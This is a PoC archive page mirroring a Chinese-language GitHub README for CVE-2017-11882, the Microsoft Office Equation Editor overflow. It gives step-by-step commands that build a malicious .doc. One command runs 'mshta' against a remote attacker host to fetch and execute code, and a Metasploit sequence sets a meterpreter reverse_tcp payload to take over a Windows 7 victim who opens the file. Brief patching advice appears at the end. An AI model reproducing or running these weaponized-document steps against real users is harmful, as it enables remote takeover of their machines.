Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-11882 PoC — Microsoft Office 安全漏洞

Source
https://github.com/littlebin404/CVE-2017-11882
Associated Vulnerability
Title:Microsoft Office 安全漏洞 (CVE-2017-11882)
Description:Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11884.
Description
CVE-2017-11882(通杀Office 2003到2016)
Readme
## CVE-2017-11882概述

从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的构建非常简单。
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。


## 影响版本: 
```
office 2003 
office 2007 
office 2010 
office 2013 
office 2016
```

## Usage

```
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
```

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/1.png)

点击生成的”test.doc”,顺利弹出计算机工具。


```
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc
```

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/2.png)

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/3.png)

成功生成11882-3.doc word文件。



将cve_2017_11882.rb文件放到/usr/share/metasploit-framework/modules/exploits/windows/smb目录下:
```
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit
```

开启监听状态:

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/4.png)

点击win7靶机中的11882-3.doc文件,获取sessions成功!

![Image](https://github.com/littlebin404/CVE-2017-11882/blob/master/img/5.png)

## 漏洞修复
①在线更新;开启Windows Update更新,这种方式对于大部分人来说就够了。 

②打补丁;此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
File Snapshot

 [4.0K]  /data/pocs/2e8b9c54e93756ca90a8fdd70c9fc01a4433cdba
├── [4.0K]  img
│   ├── [ 53K]  1.png
│   ├── [4.1K]  2.png
│   ├── [127K]  3.png
│   ├── [113K]  4.png
│   └── [142K]  5.png
├── [4.0K]  poc
│   ├── [ 11K]  Command109b_CVE-2017-11882.py
│   ├── [ 10K]  Command43b_CVE-2017-11882.py
│   ├── [9.4K]  Command_CVE-2017-11882.py
│   └── [2.9K]  cve_2017_11882.rb
└── [2.0K]  README.md

2 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →